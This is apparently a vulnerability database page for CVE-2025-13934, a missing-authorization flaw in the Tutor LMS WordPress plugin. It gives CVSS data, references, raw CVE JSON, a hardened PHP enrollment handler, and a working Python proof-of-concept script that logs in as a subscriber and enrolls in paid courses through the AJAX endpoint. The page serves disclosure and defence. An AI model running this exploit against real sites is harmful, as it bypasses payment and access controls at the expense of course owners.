Security Vulnerability Report
CVE-2025-13934 CVSS 4.3 MEDIUM

CVE-2025-13934

Published: 2026-01-09 08:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course enrollment in all versions up to, and including, 3.9.3. This is due to a missing capability check and purchasability validation in the `course_enrollment()` AJAX handler. This makes it possible for authenticated attackers, with subscriber level access and above, to enroll themselves in any course without going through the proper purchase flow.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tutor LMS < 3.9.4
Tutor LMS <= 3.9.3 (all versions)
WordPress (used together with the Tutor LMS plugin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13934 PoC - Unauthorized Course Enrollment
# Target: WordPress with Tutor LMS plugin <= 3.9.3


def exploit_cve_2025_13934(target_url, username, password, course_id):
    """
    Exploit for Tutor LMS unauthorized course enrollment vulnerability.
    This PoC demonstrates how an authenticated user with subscriber-level
    access can enroll in any course without going through the purchase flow.

    Parameters:
        target_url: Base URL of the WordPress site
        username:   WordPress user username
        password:   WordPress user password
        course_id:  ID of the course to enroll in (must be integer)
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    print(f"[*] Logging in as {username}...")
    login_response = session.post(login_url, data=login_data, verify=False)
    if ('wordpress_logged_in' not in str(session.cookies)
            and 'Set-Cookie' not in str(login_response.headers)):
        print("[-] Login failed. Check credentials.")
        return False
    print("[+] Login successful!")

    # Step 2: Exploit the vulnerability - Enroll in course without purchase
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'course_enrollment',
        'course_id': course_id
    }
    print(f"[*] Attempting to enroll in course ID {course_id}...")
    exploit_response = session.post(ajax_url, data=exploit_data, verify=False)

    # Check response for successful enrollment
    if exploit_response.status_code == 200:
        response_text = exploit_response.text
        if 'success' in response_text.lower() or 'enrollment' in response_text.lower():
            print("[+] SUCCESS! Enrolled in course without authorization!")
            print(f"[*] Response: {exploit_response.text[:500]}")
            return True
        else:
            print(f"[-] Enrollment failed or unexpected response: {exploit_response.text[:200]}")
            return False
    else:
        print(f"[-] Request failed with status code: {exploit_response.status_code}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-13934.py <target_url> <username> <password> <course_id>")
        print("Example: python cve-2025-13934.py http://example.com testuser testpass 123")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    course = sys.argv[4]
    exploit_cve_2025_13934(target, user, pwd, course)
```
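For the defensive side, here is an added example (not Tutor LMS's own code) of what a WordPress AJAX enrollment handler looks like once it performs the two checks the description says were missing: an authorization check and a purchasability check before enrolling. The functions lms_course_is_free(), lms_user_has_purchased() and lms_enroll_user() are hypothetical placeholders backed by post and user meta so the snippet is self-contained; a real plugin would use its own data layer.

```php
<?php
// Added example, not Tutor LMS code: the shape of a hardened enrollment AJAX
// handler. lms_course_is_free() / lms_user_has_purchased() / lms_enroll_user()
// are hypothetical placeholders for a plugin's own data-access functions.

add_action( 'wp_ajax_lms_course_enrollment', 'lms_course_enrollment_handler' );
// No wp_ajax_nopriv_ hook is registered, so anonymous requests never reach it.

function lms_course_enrollment_handler() {
    // 1. CSRF protection: the request must carry a nonce issued for this action.
    check_ajax_referer( 'lms_enroll_nonce', 'nonce' );

    // 2. Authorization check: the user must be allowed to enroll at all.
    //    'read' is the minimum capability a subscriber holds; a plugin would
    //    normally register and check its own enrollment capability instead.
    if ( ! is_user_logged_in() || ! current_user_can( 'read' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }

    $course_id = isset( $_POST['course_id'] ) ? absint( $_POST['course_id'] ) : 0;
    $course    = $course_id ? get_post( $course_id ) : null;
    if ( ! $course || 'lms_course' !== $course->post_type || 'publish' !== $course->post_status ) {
        wp_send_json_error( array( 'message' => 'Invalid course' ), 400 );
    }

    // 3. Purchasability validation: a paid course may only be joined through
    //    the purchase flow, never by calling this handler directly.
    $user_id = get_current_user_id();
    if ( ! lms_course_is_free( $course_id ) && ! lms_user_has_purchased( $user_id, $course_id ) ) {
        wp_send_json_error( array( 'message' => 'Course must be purchased first' ), 402 );
    }

    lms_enroll_user( $user_id, $course_id );
    wp_send_json_success( array( 'course_id' => $course_id ) );
}

// Hypothetical placeholders, backed by meta so the example is self-contained.
function lms_course_is_free( $course_id ) {
    return 'free' === get_post_meta( $course_id, '_lms_price_type', true );
}
function lms_user_has_purchased( $user_id, $course_id ) {
    return in_array( (int) $course_id, (array) get_user_meta( $user_id, '_lms_purchased', true ), true );
}
function lms_enroll_user( $user_id, $course_id ) {
    $enrolled   = (array) get_user_meta( $user_id, '_lms_enrolled', true );
    $enrolled[] = (int) $course_id;
    update_user_meta( $user_id, '_lms_enrolled', array_values( array_unique( $enrolled ) ) );
}
```

The purchasability check is the server-side gate: whatever the client sends, a paid course is only granted once a purchase record for that user exists.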

References

Weakness: CWE-862 (Missing Authorization)
https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php (plugin changeset on WordPress.org Trac)
https://www.wordfence.com/threat-intel/vulnerabilities/id/5de212c9-5c2e-4713-b1ce-022dd84520c3?source=cve (Wordfence vulnerability entry)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13934",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T08:15:57.007",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course enrollment in all versions up to, and including, 3.9.3. This is due to a missing capability check and purchasability validation in the `course_enrollment()` AJAX handler. This makes it possible for authenticated attackers, with subscriber level access and above, to enroll themselves in any course without going through the proper purchase flow."
      },
      {
        "lang": "es",
        "value": "El plugin Tutor LMS – solución de eLearning y cursos en línea para WordPress es vulnerable a la inscripción no autorizada en cursos en todas las versiones hasta la 3.9.3, inclusive. Esto se debe a una falta de verificación de capacidad y validación de la posibilidad de compra en el manejador AJAX 'course_enrollment()'. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, se inscriban en cualquier curso sin pasar por el flujo de compra adecuado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{ "lang": "en", "value": "CWE-862" }]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5de212c9-5c2e-4713-b1ce-022dd84520c3?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```